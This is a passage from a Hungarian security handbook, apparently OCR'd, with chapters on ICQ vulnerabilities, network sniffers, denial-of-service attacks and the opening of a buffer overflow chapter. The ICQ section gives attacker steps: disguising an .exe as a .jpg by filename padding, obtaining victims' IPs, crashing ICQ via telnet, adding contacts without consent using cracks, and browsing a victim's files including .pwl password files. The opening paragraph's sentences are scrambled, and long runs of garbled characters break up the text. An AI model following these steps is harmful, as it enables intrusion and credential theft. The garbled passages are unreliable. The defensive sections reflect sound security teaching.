és belenézni. az e-mail címét vagy a UIN-t. vagy egyszerűen a UIN. és a támadóknak szállítják a megfelelő információkat. az IRC (InternetRelayChat) mellett az internet egyik legtöbbet használt chatrendszerévé fejlődött. Az ICQ biztonsági kockázata azonban sokkal inkább annak a rendszernek a biztonságosságán múlik. amelyeknél a támadó üzenetek sokaságával bombázza az áldozatot (lásd ebben a fejezetben. a választék az Online. mint magán az ICQnetworkön. Tulajdonképpen a címünkhöz vagy az IP-nkhez hasonlítható. Az ICQ minden felhasználója egy saját számot kap. mert túl veszélyes". Az IP kiadása ugyan különböző beállításokkal megakadályozható (a 99b verziótól egy másikat is lehet megtévesztésként mutatni). de az interneten egyre több program található. Windows ICQ Client v. hogy ki van onlineban. .1 Az ICQ .biztonsági kockázat? Az utóbbi időben elszaporodtak azok a vélemények. Az ICQ legnagyobb veszélye tulajdonképpen abban rejlik. Azok a támadások is kedveltek. Ez a szám a Universal Identifier Number. Így a rendszer nem tud elindulni.microsoft. 2. hogy ez mit jelent). vagy ki akarja. akikkel rendszeresen szeretnénk kapcsolatot tartani. az Offline. az Away és az Invisible. A kliense a legkülönbözőbb platformokon megtalálható.4. amikor bejelentkezik a kommunikációba. a Mailbombák alatt. és a gép lefagy. minden alkalommal elindul ez a fájl.

A trükk a következő: a támadó kitömi a def. def.jpg . Ha elküldi ezt a fájlt. hogy azonnal eldobja az ismeretlen linkeket. amelyeket nekünk küldenek.4. És itt is működik az ott már leírt trükk: tegyük fel.2 Milyen biztonsági rések vannak? Korrupt linkek A különböző linkek megnyitása az ICQ-felhasználónál aktiválhat egy fájlt.yahoo. itt nem lényeges információkkal. Bizonyos parancsokkal összefüggésben azonban az egész merevlemezt is formattálhatják. úgy ICQ-val is lehet fájlokat küldeni és fogadni. A link így nézhet ki: http://www.exe fájl nevét egy sor üres karakterrel.com/link. pl. Egy ilyen támadást hajtottak végre például tesztcélokból egy Windows 98 és egy 2000 platform „ellen". hogy az ICQ-kliensünket úgy állítjuk be. a fogadónál megjelenik egy popup ablak a fájl megnevezésével és más.exe Az exe fájlból semmit sem látni *-ADADADADADADvADADADADADADADADADADADvADADADADA DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D *ADADADADADADADAD h»ADADADADADADvADADADADADADADADADADADvADADADADA |*>DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D i*-ADADADADADADADAD *»D D D D D A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D *ADADADADADADADAD ^ADADADADADADvADADADADADADADADADADADvADADADADA DADADADAD ^A£)A£)A£)A£>A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A ^A£)A£)A£)A£)A£)A£) V A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£) V A£)A£)A£)A£)A A A A A . Fájlnevek kitömése az ICQ 99 alatt Ahogy mailben.jpg. egy trójait vagy egy vírust stb.asp? A DADADADADADADADADADADADADADADADADADADADADADAD *-ADADADADADADADAD ^A£)A£)A£)A£)A£)A£) V A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£) V A£)A£)A£)A£)A *-DADADADADADADADAD *ADADADADADADvADADADADADADADADADADADvADADADADA DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D *»ADADADADADADADAD ^ADADADADADADvADADADADADADADADADADADvADADADADA *-DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D *-ADADADADADADADAD ^ADADADADADADvADADADADADADADADADADADvADADADADA DADAD!Ü! pl A£)A£)A£)A£)A£)VA£)A£)A£)» *DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D ^•ADADADADADADADAD *ADADADADADADvADADADADADADADADADADADvADADADADA *»DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D ta»A£)A£)A£)A£)A£)A£)A£)A£) Védelem Ez ellen úgy lehet védekezni. például egy trójait vagy egy vírust.8. hogy a támadó küld a usernek egy fájlt.

Rendesen ugyanis kap egy értesítést. Ezért a legjobb védekezés az aktuális verzióra történő frissítés. amelyet hozzá akar fűzni. linkkel lehet elérni. hogy az ICQ nem tud üzeneteket küldeni. Ezután meg kell szakítani a kapcsolatot a hálóval. Ez az ICQ-path megadása után a kontaktlistára bejegyzett userek minden IP-jét visszaadja. Megnézni egy felhasználó fájljait Itt megintcsak előfeltétel. a Next-re kattint. Az . hogy megtámadja ezeket a rendszereket. a Find User-rel megkeresi azt az UIN-t. ráadásul anélkül. ahol a 217. User hozzáfűzése engedély nélkül Az ICQ jóváhagyása időnként elég terhes a támadóknak. az . és a hacker ismerje az IP-jét. hogy a felhasználó egy webszervert telepített. . megpatcheli a crackkel. hogy felkerült egy listára. egyetlen kattintással kijelöli a személy nevét. Letölt magának egy ICQ-cracket az internetről. Ha a támadó például egy trójait vagy egy vírust használt.exe már nem látható. anélkül.40:80. és megpróbál hozzáfűzni egy felhasználót. a támadónak a következő lehetőségei vannak. Vagy a támadó a partnerrel való beszélgetés közben egyszerűen beírja a parancssorba: netstat -n. hogy működtetünk-e webszervert a rendszerünkön.172. Itt az IP! Az ICQ lefagyasztása ICQ alatt megmutathatjuk más felhasználóknak. Mire minden hibaüzenetet tudomásul vettek. hogy az áldozat ezt észrevenné. amely közli. Ez egy jó példa volt az ICQ kliens még fennálló bizonytalanságaira. hogy a rendszeres frissítés legalább rövid távon védelmet kínál. és most is megjegyzendő. Ezt a problémát elkerülendő. a támadó már ott van a kívánt személy kapcsolati listáján. Ha ezt elintézte. és egy idő múlva nem jelenik meg online-ként. Egy erre a célra szívesen használt eszköz a UIN-IP.. könnyen áldozat lesz.exe végződés helyett csak a -jpg-et látjuk. amit gyakran ki is használ. amelyek azt mondják. hogy az erről bármit is tudna. Ezután egyszerűen Quit-et ír a Telnet kliensbe. hogy többet megtudjon a chat-partneréről. amelyek lehetővé teszik a felhasználó felvételét a kapcsolati listára anélkül. Amint az ICQ a kérdésre pozitív választ ad. A felhasználó azt gondolja. ha elfogadja és végrehajtja a fájlt. akár meg is támadhatja. és a tulajdonképpeni végződés. inaktiválja az ICQ-t.Így a popup ablakban már nincs elég hely. Védelem Ez a bug az ICQ 2000-ben már nincs benne. Az így jelzett webszerver ugyanis behatolási pontot nyújthat a támadónak. Ha ez sikerült. Egy ilyen jel a hackernek égből pottyant ajándék. a parancssorba a következőt írja: Telnet 217. vagy ha akarja. Védekezés Az ICQ rendszeresen dolgozik chat-rendszere biztonságán. Az interneten ehhez egész sor tool és crack van.82. hogy tényleg csak egy képet akarnak küldeni neki. ha egy áldozatot akarnak felvenni a kontaktlistájukra.172. Most teljes nyugalomban megfigyelheti az áldozatát. akkor a felhasználóból. hogy ő bármit is észrevenne ebből.82. Ezt többnyire a fenti ikonra történő kattintással vagy a http://ipdesusers. Ezáltal az áldozat ICQ-ja bezáródik.40-et a megtalált IP-re cseréli. Az ICQ hibajelzéseket ad. Ha a hackernek csak az áldozat IP-je van meg.

Védekezés Ha webszervert kell futtatnunk.40 az áldozat IP címe.pwl. .40 /. A legtöbb esetben azonban a Windows szabvány könyvtárstruktúrája fordul elő. A pontok a könyvtárakat jelölik. ahol a 217.172. ne használjuk ezen a gépen az ICQ-t.172. amelyekre váltani kell. mert a támadó nem fogja ismerni a pontos könyvtárstruktúrát. így a jelszavak elérésére is van lehetőség. hogy a C:\-hez jusson.82. Most a támadó a számítógépére tudja menteni a kiválasztott fájlokat. user.Most például beírhatná a böngészőjébe: http:// 217.html/.82. Természetesen ez csak egy példa.

Tartalom 9.3 9. fejezet .2 9.9.4 Mi az a sniffer? Hogyan működik egy sniffer? A sniffer veszélyei Mit lehet tenni a snifferek ellen? .1 9.

Hasonló rendszert találunk az internet-címzésnél is. amelyiknek címezve vannak. az Az Analyzer az egyik legismertebb sniffer . Ha elküldünk egy üzenetet. 9. Annak persze nem lenne értelme. a sniffer tulajdonságaitól függően. akkor a rendszergazda bevethet egy sniffert. betekintést kínálva annak. Egyrészt a rendszergazdák pótolhatatlan segítőtársai a hálózati problémák vagy a potenciálisan veszélyeztetett területek felderítésében. hol van a probléma a hálózaton belül. a Banyán VINES és az LCC. A snifferek a WWW/LAN/WAN egyes gépeire telepíthetők. A hálózatban gyakran használnak hub-ot az adatok szétosztására. 9. Ezek. hogy egész hálózati csomagokat „hallgassanak le". lehetnek például jelszavak vagy felhasználói nevek. de a nem neki szóló címzés miatt nem dolgozza fel azokat.2 Hogyan működik egy sniffer? Egy számítógép valamennyi hálózati interfészének saját címe van a LAN-on. Ez a mód bizonyos alkalmazásokon keresztül akkor is megengedi a csomagok felvételét és feldolgozását. Így a sniffer hozzákezdhet a tulajdonképpeni munkájához. az Apple Talk. melyek a snifferek felhasználási területei. ha azok nem az illető gépnek vannak címezve. ethernet frame-nek is nevezett csomagokban kerül a hub-ra. Ezen a ponton avatkozik be a sniffer. A felhasznált sniffertől függően különböző protokollokat lehet lehallgatni. az IPX. Az elfogott információkat a sniffer az output (kimeneti) fájlokba menü. Ezért a legtöbb sniffert úgy tervezték. naplózzák az adatfolyamot. hogy csak a valóban releváns adatokkal foglalkozzon. Ez különbözteti meg a komputert a hálózat többi tagjától. hogy a hálózat teljes adatforgalmát kiértékelje. Ha például gondok támadnak a hálózat egy részében a hiányos konfiguráció miatt. és rendszerint egy fájlba írják az analizált adatokat. mert a legtöbb információ egyáltalán nem érdekes. Az adatokat csak az a számítógép veszi fel. hogy mit is rejt ez a fogalom. és onnan továbbítódik minden csatlakoztatott számítógépre. hogy magállapítsa. Ezek közé tartoznak többek között: a TCP/IP (Ethernet/WWW). amely a hálózati interfészt úgynevezett promiscuous módra állítja át. Másrészt a snifferek lehetőséget nyújtanak a támadóknak. Ebből a fejezetből kiderül. A többi hálózati interfész ugyan fogadja az adatokat. és milyen gondokat okozhatnak. aki installálta a sniffert.1 Mi az a sniffer? A sniffereknek különböző felhasználási területeik vannak.9 Sniffer A snifferek jelentik az egyik legnagyobb veszélyt a hálózatokra. külön kis.

A snifferek a normál felhasználó szempontjából semmilyen nyomot nem hagynak maguk után. Ha azonban a támadó egy. az S/POP nevű eljárás. a hub-ok helyett switcheket vagy auto-switching hub-okat is használhatunk. hogy csak a címzett gép tudja dekódolni. mint amilyen az SSH vagy az SSL. állandó jelszavuk. A mail-postafiókok elleni támadásoknak is van egy biztos ellenszere. a 3Com. A reakcióidő ellenőrzése Ha egy számítógépre. amelyek tesztelni tudják a hálózati reakcióidőket. éppúgy. azonban ahogy ez a protokoll majd szabvánnyá válik a hálón. amelyek csak egyszer érvényesek. amely szintén kódolva továbbítja az adatokat. Nagyobb hálózatoknál megfontolandók az olyan biztonsági mechanizmusok. ha van egy saját. Az alábbi táblázatból részletesen megismerhetők a védelmi mechanizmusok. ráadásul csak a támadó gépén futnak. mint a fentiek. Így azután nem is szükséges közvetlenül beavatkozni egy meghatározott felhasználó rendszerébe ahhoz. A csatlakozások ellenőrzése A rendszergazda is ellenőrizheti a LAN-ban található számítógépek hálózati kártyáit promiscuous módra vagy egyéb gyanús alkalmazásokra. Ha biztosra akarunk menni. Felhasználói oldalról titkosító protokollokkal. Intézkedés Hálózati kártya Leírás Egyszerűbb és olcsóbb megoldás megfelelő hálózati kártyával felszerelni a LAN-ra csatlakoztatott számítógépeket. akkor jól be lehet határolni azt a számítógépet. kevéssé hatékony. Mivel egy sniffer csak úgy tud működni. Ezek az eszközök azonban drágábbak az egyszerű hub-oknál. és a felhasználók sem veszik szívesen. amelynek a hálózati interfésze promiscuous módban van. mert a teljes hálózati adatforgalmat felügyelhetik. Ipv6 Hamarosan megjelenik a TCP/IP új verziója. amely nem engedélyezi ezt a módot.9. az IBM. a megoldás kézenfekvőnek tűnik: csak olyan hálózati kártyát szabad használni. mint hogy nem tároljuk a jelszavakat a merevlemezen.4 Mit lehet tenni a snifferek ellen? A snifferek felfedezéséhez és eltávolításához jól kell ismerni a hálózati topológiát. amit a sniffelés után magával visz. amelynél az adatok hálózati szinten lesznek kódolva. Ez a protokoll Ipsec-et is tartalmaz. mégpedig úgy. amely Ipv6 vagy IPng néven ismert. Részletesen most nem foglalkozunk az Ipv6-tal. valóban csak a célgépre továbbítják az adatokat. A döntően hálózati felhasználás azonban alapvetően nagyobb ráfordítást igénylő intézkedéseket tesz szükségessé. amelyek. a reakcióideje hosszabb lesz az általában szokásosnál. Vannak programok. adatokat küldenek. Az olyan biztonsági intézkedések. Titkosítás Az alkalmazásokban használt kódolás minden bizonnyal a legfontosabb védelem a sniffer-támadások ellen. 9. a normál hubokkal ellentétben. Intézkedés Adatelosztás Leírás Egy sniffer támadási pontját tulajdonképpen a hubnak az a tulajdonsága nyitja meg. Ezért a normál hálózati felhasználó aligha tudja felfedezni a sniffert a LAN-on. a hálózatba integrált notebookot használ. Ezeknél jelszavak kiosztásáról van szó. Ha egy hálózatban rendszeresen tesztelik az egyes csatlakoztatott számítógépek reakcióidejét. a snifferek problémája is meg fog szűnni (egy időre). hogy a fogadott adatokat minden vele kapcsolatban álló számítógépnek elküldi. amelyik potenciális sniffer lehet. . védhetjük az adatainkat a siffherek ellen. amelyekről a továbbiakban még írni fogunk. mert ezeket bármikor megtudhatja a sniffer. ez a variáció. ha a hálózati kártya promiscuous módban van. hogy kikémleljék mail-postafiókja vagy online banki jelszavát. Titkosítással biztonságossá lehet tenni az adatátvitelt. mert jobban szeretik. a Hewlett-Packard és az Intel. A leleplezéshez csak a rendszergazdáknak vannak különböző programjaik. tulajdonképpen semmit sem érnek. Ezeket használják akkor is. vagyis passzívan működnek.3 A sniffer veszélyei A snifferek nagy veszélyt jelentenek a hálózati struktúrára. Ilyen kártyákat (is) kínai pl. Sajnos ez az eljárás elég költséges. mint az S/Key vagy a SecurelD-Token. amikor egy hálózat teljesítményének a gyenge pontjait keresik.

hogy sok. amelyek azt a számítógépet ellenőrzik. Az ilyen programokkal szemben azonban mindig egy kicsit szkeptikusnak kell maradni. mégsem kínálnak lehetőséget az adatok kódolására. Unixhoz/Linuxhoz a Beavis and Butthead. Anti-sniffer' A hálón a legkülönbözőbb programokat kínálják a snifferek felkutatásához. Ha azonban a PGP-vel kódolt maileket a mail-szerveren nyitják meg (ami biztosan gyakran megtörténik). ha egy másik számítógép éppen sniffel. Az e-mail-küldésnél mindenesetre problematikus. mert többnyire csak bizonyos hálózati kártyák búgjait ellenőrzik. SSL SSH Mivel a Telnet kódolatlanul továbbítja az adatokat. így ezt is minden sniffer foghatja. Tehát figyelni kell arra. a kódolási folyamatnak automatikusnak is kellene lennie. így a sniffer nem tud mit kezdeni velük. például a jelszavakat és a parancsokat is.Intézkedés Leírás A HTTP-átvitelek titkosítására szolgál az interneten az SSL (Secure Socket Layer). Vannak azonban olyan programok is. hogy védetten lehessen bejelentkezni a Telnetről. amely mint snifftest. ha a fájlok megnyitása a saját gépen történik. Ilyen program pl. amelyek felhívják a figyelmet az ilyen támadásokra. vagy olyan programokat használnak. Védelmi Intézkedések a snifferek ellen Végeredményben azonban mindig lesznek programok.c is ismert. amelyek leleplezik. hogy milyen szolgáltatásokat veszünk igénybe a kevéssé biztonságos hálózatokon keresztül. amelyen éppen lokálisan rajta vagyunk. amelyek ugyan hálózatról működnek. Mivel a legtöbb felhasználó nem szívesen használ manuális kódolást. de nincs nagy hasznuk. . elérhetik ugyan a céljukat. mivel ott az adatok eleve kódolva továbbítódnak. A PGP-vel vagy hasonló programokkal kódolt fájlok/mailek biztonságában is csak akkor lehet bízni. akkor a megnyitáshoz szükséges jelszó megint csak a hálózaton megy keresztül. új lehetőséget kellett fejleszteni. Igazán csak az IPv6 használatával lehet majd biztonságos adatátvitellel számolni. Az olyan programok. A szokásos Telnet-kliensek helyett SSH-klienset (Secured Shell) is lehet használni. Már böngészőket is lehet kapni megfelelő erős kódolással. amely csak biztonságosan kódolva továbbítja az adatokat. csupán mail-szolgáltatást kínáló szolgáltató csak üzletileg kínálja az SSL használatát.

Distributed Denial of Service támadások Védelem a DoS-támadások ellen .9 Ping-Flodding Smurf DDoS .5 TCP-Syn-Flooding 10. fejezet.Tartalom 10.10.6 10.a „nuken" Large Packet-támadások avagy a Ping of Death Land támadások 10.1 10.8 10.4 Az IP-spoofing mint előfeltétel Out-of-Band csomagok .3 10.7 10.2 10.

A különböző támadásokhoz egész sor eszköz áll a támadók rendelkezésére. amelyeknek többnyire jól kezelhető. hogy az egy ideig nem is tudja újrakezdeni a működését. Az egyik legismertebb támadást 2000 februárjában. Sajnos.10 A Denial of Service támadás A DoS. A DoS-támadások ugyanúgy érintik az internet-felhasználókat. például a webszervereket. A WinGates 4. Kedvelt célok azok a felhasználók is.2 Out-of-Band csomagok . amely lehetetlenné teszi hamisított IP-csomagok internetre küldését a csatlakoztatott hálózatüzemeltetőknél. sok DoS-támadás alapját képzi. és a 139. akik game-szervereken vagy IRC-szervereken találhatók. és úgy lefagyasztják.1 Az IP-spoofing mint előfeltétel Az IP-spoofing egy támadási eljárás. mind a 2000-t ellenállóvá tette e támadások ellen.szolgáltatás megtagadó) támadások az internet egyik legnagyobb veszélyforrásává váltak az idők során. Az eredmény azonban mindig ugyanaz: a megtámadott számítógép felmondja a szolgálatot.(Denial of Service -. és .Telnet session-ökhöz használják. programok és protokollok hibáit használják ki. amelynél hamis IP-számot használnak. és ezeken egyenként körülbelül 40000 karaktert küldenek. a CNN és néhány más nagyobb portál ellen a hálón. 1998-ban létrejött egy védelmi szervezet. . ha a támadó nem talál más utat. Az OOB a TCP/IP egyik tulajdonsága. és megakadályozzák az azonosítását. Megengedi az adatok átvitelét a normál sorrenden kívül. amelynél a csomag feladójának a címét megváltoztatják. A Microsoft felismerte ezt a hibát. mint a szervereket. DoS-támadásokat többnyire akkor hajtanak végre. hogy minden Kettő a legismertebb nukerek közül 10. Vagy már a támadást is ez teszi lehetővé. így a támadónak még alaposabb technikai ismeretekkel sem kell rendelkeznie a használatukhoz. hogy a rendszert lerohanja. ez csak egy behatárolt megoldás. vagy ha éppen az a célja. grafikus felületük van. Egy ilyen támadásnál számítógépeket rohannak le az interneten. hogy ezeknek a támadásoknak különböző fajtái vannak. csak a hencegése alapján kapták el egy idevágó chatszobában.többek között .01-t például így lehetne megtámadni: 100 kapcsolatot állítanak elő a WinGates-hez. portok egy számukra nem értelmezhető karaktersort kapnak. hogy egy rendszert újraindításra kényszerítsenek valamilyen változtatás érvénybe léptetése érdekében (jelszó: trójai). A rendszerek kiesése következtében fellépő kár mintegy 100 millió dollárra rúgott. hogy a rendszert egy időre lebénítsa.a „nuken'' A legismertebb DoS-támadások közé tartozik a miken vagy az Out-ofBand (OOB) csomagok küldése. Ezért az Out of Band csomagokat az olyan rendszerek megtámadásához használják. a rendszer összeomlik. aki két napig bombázta a Yahoo-t és társait. hogy a támadó nyomait eltüntessék. mint például a WinGates. A DoS-támadások célzott végrehajtásának másik oka lehet például. két napon belül indították a Yahoo. Az IP-spoofing. az eBay. A DoS-támadások az operációs rendszerek. A WinGatesszerver feltételezi. Ha a 135. és ezzel a protokollal továbbítódik. és mind a Windows 98/98SE/ME-t. 10. Így a támadót. hogy hamis identitást színleljenek a megtámadott IT-rendszer felé. ami azt jelenti. vagy arra szolgál. Az Out of Band csomagok felhasználását a DoS-támadásokhoz a Microsoft egy hibás NetBEUI implementációja tette lehetővé. mert csak a szervezethez kapcsolódó rendszerekből érkező támadásokat akadályozza meg.

Aki viszont Land támadást hajt végre. • A támadó elküldi a SYN l-et. UDP és TCP. hogy az adatok át tudjanak futni a különböző hálózati rétegeken. és a számítógép bizonyos várakozási idő után eredménytelennek nyilvánítja a kísérletet. A támadásnak ezt a fajtáját az elkészült bugfixekkel ma már a legtöbb operációs rendszer visszaveri. Az ennél nagyobb csomagokat fragmentálja. Mindez azért történik. Az első csomagban még egy TCP-header is található. hogy milyen csomagról van szó. A host ezt megpróbálja egy „OK. vagyis „Beszélni akarok veled" üzenetet küld a hostra. amíg el nem használja a szerver pufferét. hamisított feladóval küldi a SYN-csomagokat egy szerverre . a résztvevők először egy Three Way Handshake-et váltanak. hogy az utolsó töredéknek olyan offset értéket lehet adni. és aztán újra reassemblálja (összerakja) őket. • A host válaszol a SYN l-re. és várja a választ. ahol a sok IP-stack egyfajta túlcsordulást idéz elő. és az adattömeg addig halmozódik. vagyis feldarabolja.a feladó címe megegyezik a címzettel. és megbénítja az áldozat rendszerét. hogy a hostot rettenetes mennyiségű további SYNcsomaggal bombázza. akkor speciális IP-csomagokat küld. elküldi az ACK l-et. 10. az rövid időn belül felmondja a szolgálatot. egy ilyen támadás lefolyásának a sémája.kapcsolat fennmarad. Ezek ellen a támadások ellen is régóta létezik már bugfix. A címzett reagál erre. valamint a portszám. Ezek a tények teszik lehetővé. • És így tovább. • A támadó elküldi a SYN 3-at. és előállítani a kapcsolatot.3 Large Packet-támadások avagy a Ping of Death A Denial of Service támadások különösen végzetes fajtája a Ping of Death. elküldi az ACK 2-ét. Ezeket SYNcsomagoknak is nevezik. Minden csomagtöredék tartalmaz egy offset értéket és egy azonosítási számot. de ezt a csomagot most egy saját nyitott portjára fogja küldeni. kész vagyok" ACKválaszcsomaggal nyugtázni. amelyről ebben a fejezetben még szó lesz. és a gép összeomlik. hogy egyszerűbb legyen az átvitelük. hogy egy rendszert hatalmas adatfolyammal terheljenek. amely meghatározza. Ez a kísérlet azonban. sikertelen lesz. A szerver minden SYN-csomagra ACK-csomaggal válaszol. out of buffer hibaüzenetet kap. és várja a választ az ACK l-re és 2-re. íme. amely a teljes csomagot nagyobbnak mutatja 65535 bájtnál. a nemlétező feladó miatt. . Ez a túlméretezett csomag túlcsordulást (Buffer Overflow-t) okoz a rendszerben.4 Land támadások A Land támadások a TCP-implementáció egy hibáját használják ki ahhoz. • A host válaszol a SYN 2-re. • A támadó elküldi a SYN 2-t. a protokoll-implementáció említett hibáját kihasználva. majd összeomlást idézzenek elő. amelyekkel bejelenti a kapcsolatot. Ez a következőképpen történik. Ezt a folyamatot Three Way Handshake-nek is nevezik. 10. Ha most a rendszergazda megpróbál belépni. A Ping of Death támadások a következő protokolloknál lehetségesek: ICMP. Az Internet Protokoll headerrel (fejléccel) együtt pontosan 65535 bájtot csomagol egyetlen csomagba. 10. ha két számítógép között TCP/IP-n keresztül jön létre kapcsolat. és válaszul ACK-csomagot (ACK = Acknowledgement = a fogadás nyugtázása) küld. Ha ezt a várakozási időt a támadó arra használja.5 TCP-Syn-Flooding Mint ahogy a Land támadásoknál már leírtuk. Röviddel a halálos lökés előtt Mikor egy számítógép kapcsolatot próbál felépíteni egy másikkal. Ez utóbbinak semmi köze a tulajdonképpeni ping-parancshoz. A TCP-Syn-Flodding támadásnál a támadó először hamis feladóval nagy számú SYN-csomagot. az Ethernet-csomagok pedig csak 1500 bájtosak.

hogy fel tudja tölteni a scripteket a támadáshoz. 10. Ezek azonnal tájékoztatnak az újabb gyenge pontok felfedezéséről. (A trójaikról a 4. Ehhez a támadó hibás rendszereket keres szkenneléssel (közelebbit lásd a szkennelésről szóló fejezetben). Legyen az szerver vagy normál felhasználó .8 DDoSDistributed Denial of Service támadások A DDoS-nál (DDoS-támadás = elosztott szolgáltatás megtagadó támadás) még a tulajdonképpeni roham előtt szerez a támadó elérést néhány másik rendszerre.minden esetben érvényes.9 Védelem a DoS-támadások ellen A normál felhasználó számítógépe nemcsak áldozata lehet a DoStámadásoknak. amelyeken biztosítani tudja magának a rendszergazdai jogokat. A 2000. az áldozat több mint egymillió választ kap. hogy mindig legyen aktuális vírusvizsgáló a gépünkön. Ha az ismétlés elég gyakori. s az áldozatot csomagok áradatával önti el. Ezeken a rendszereken trójaiakat helyez el. ha a szolgáltatója a forgalom szerint számol el. és rövid idő múlva frissítést kínálnak hozzájuk. hogy megállapítsák egy host elérhetőségét. az áldozatéi. a broadcast cím mögötti számítógép válaszol. a host nem tud több kérdésre válaszolni. Megpingelünk egy hostot.vagy ISDN-csatlakozás) is térdre tudnak kényszeríteni nagy átviteli sávszélességgel rendelkező áldozatokat. Az érintett rendszer a bemenő adatok terhe alatt szó szerint összeomlik. amelyre minden. A scripteket. A megváltoztatott feladócímek. hogy minden választ az áldozat kap meg. hogy a támadó a lehető legtöbb olyan rendszert megtalálja. Előkészület egy DDoS támadásra 10. hogy mindig tájékozódni kell a mindenkori operációs rendszer biztonságot érintő frissítéseiről. hogy sor kerüljön a további feldolgozásukra. Ha ilyen módon másodpercenként 1000 pinget küldenek 1000 különböző számítógépre. és meg lehet akadályozni.cert. hogy távirányítani tudja a szá- . Ráadásul a ping-flodding támadásokat az áldozat csak akkor fogja észrevenni.6 Ping-Flodding A pingeket az interneten és a hálózatokban használják. hanem arra is használhatják a támadók. A DoS-támadások ellen a jól konfigurált tűzfalak is védelmet kínálnak. és ezeket arra használja. mítógépeket. visszhangszerű választ ad. a host pedig valamennyire megpróbál válaszolni. ezeket feltölti scriptekkel vagy programokkal.7 Smurf A Smurf-nél a támadó egy hálózat broadcast címére küld egy pinget manipulált feladócímmel. Pingekkel bombázzák a célt. A gyártók előbb vagy utóbb felfedezik az operációs rendszerekben és a szerverszoftverekben a biztonsági szempontból gyenge pontokat. februári híres DDoS támadások óta állandóan növekszik az ilyen jellegű támadásokra alkalmas programok száma a Yahoo.10. illetve a programokat többnyire trójaiak segítségével telepítik a rendszerekre. és ha elérhető. Smurffel akár nagyon kis átviteli kapacitással rendelkező támadók (modem. azt eredményezik. ezért is elengedhetetlen. az eBay és társai ellen. Ezt használják ki a támadók a Ping-Floddingnál. A segítségükkel el lehet kapni a módosított csomagokat.org és a gyártóéra.) Ha elegendő kiszolgálót talált. Hogy a gyenge pontok dolgában mindig képben legyünk. hogy az áldozatát nagy mennyiségű adatcsomaggal szembesítse. Az ilyen támadások után többnyire teljesen le kell venni a szervert a hálózatról. 10. érdemes előfizetni a Computer Emergency Response Teams (CERT) levelezőlistájára http://www. fejezetben írtunk. Ez bizony rengeteg választ jelent. Az előkészítés abból áll. és beszerzési forrást kínálnak a megfelelő frissítésekhez. hogy rajta keresztül hajtsák végre más rendszerek ellen a támadásokat. amitől az összeomlik.

2 Hogyan működik? 11.5.3 A stack (magyarul: halom/rakás) 11.5 Áldozat a Buffer-Overflow-kért Honnan lehet felismerni a Buffer-Overflow-t? Milyen védelmi mechanizmusok vannak? 11.1.Tartalom 11.2.2.2 A Buffer-Overflow-k és a tűzfalak .1 Hogyan lehet ezt kihasználni? 11.1 Szöveg 11. fejezet .1.2.11.3 Minek kell a Shellcode változónál állnia? 11.4 11.1 Összefüggés a CPU és a Buffer-Overflow között.2 A Buffer-Overflow-támadások 11.2 Adatok 11. 11.1.5.3 11.1 Az operációs rendszer memóriakezelése 11.

hogy támadásokat hajtsanak végre szerverek ellen. first out). számú lap.static"-ként deklarálódnak. elsőként kerülnek ki. 11. számú és legalul az 1. hogy megöröklik a megszakított szolgáltatás jogait. first out) működik.1 Az operációs rendszer memóriakezelése Az alábbi vázlat egy operációs rendszer memóriafelépítését szemlélteti. amelyet egy program kiad. amelyekre egy program futása ugrik.1. 1996-ban az AlephOne Bugtraq levelezőkör moderátora cikket közölt Smashing the Stack for Fun and Profit címen. hogy kidöntsenek egy weboldalt. megpróbálja beleírni. ha egy eljárás vagy függvény lefutott. amelyek .) Erről azonban később. de távoli eléréssel is. 11.1.1 Szöveg Egy adott programhoz rendelt memóriatartomány több részre oszlik. Azokat az adatokat.1. Ennek a hozzárendelt területnek a méretét a „brk" paranccsal lehet megkapni. Más elérések „segmentation fault" hibával végződnek. Egyes esetekben ez akár a boot-jogokig terjedhet.2 A Buffer-Overflow-támadások A Buffer-Owerflow tulajdonképpen annyit jelent. amelyben a normál változók adatai találhatók. amelyek legfelül helyezkednek el (tehát utoljára kerültek oda). Így végre lehet hajtani fizikai hozzáféréssel a szerverhez.3 A stack (magyarul: halom/rakás) A stacket elképzelhetjük úgy. amelyekkel az egész számítógép felett ellenőrzést szereznek. ellentétben a FIFO-elvvel (first in. amelyek már nem férnek be a pufferba. Az alsó memóriában illetve a szövegrészben csak karakterláncok vannak tárolva. mint amennyit az fel tud dolgozni. A stack szerkesztésének legfontosabb assembler parancsai a PUSH (adatokat tesz a stackhez) és a POP (olvassa a stack legfelső elemét). mint egymásra halmozott lapokat.2 Adatok Az adatrész inicializált és inicializálatlan adatokra osztható.. például a Súgó szövege. hogyan vezethet a rossz programozás biztonsági résekhez. ahol legfelül van a 10. Ezzel egymásra épülő célokat lehet elérni: pl. 11. Ezt úgy csinálják. Ez azt jelenti.11 Buffer-Overflow 11. hogy az elemek. A Buffer-Overflow-rohamokat arra használják. A legérdekesebb ezekben a támadásokban a Buffer-Overflow-rohamok függetlensége a támadó székhelyétől. egy bizonyos szolgáltatást összeomlásra kényszeríteni. Alsó memória SZÖVEG inicializált adatok inicializálatlan adatok Felső memória STACK Memóriafelépítés 11. A címek. Ennek következtében az . ahelyett. szintén a stackben tárolódnak (például a szegmensek kezdő címei. A stack LIFO-elven (last in. mint amilyennel például a pipe-nál találkozhatunk. hogy többet írnak a pufferbe. Ezeket a karakterláncokat az operációs rendszer „readonly"-ként kezeli. amelyeket aztán puffer-túlcsordulásos. hogy később speciális jogokat szerezzenek a szerverhez. De arra is lehet használni ezeket a támadásokat. vagyis ezeken nem lehet változtatni. Ebben leírta. A stack az a memóriaterület. hogy eldobná a program. vagyis Buffer-Overflow támadásokhoz lehet felhasználni.

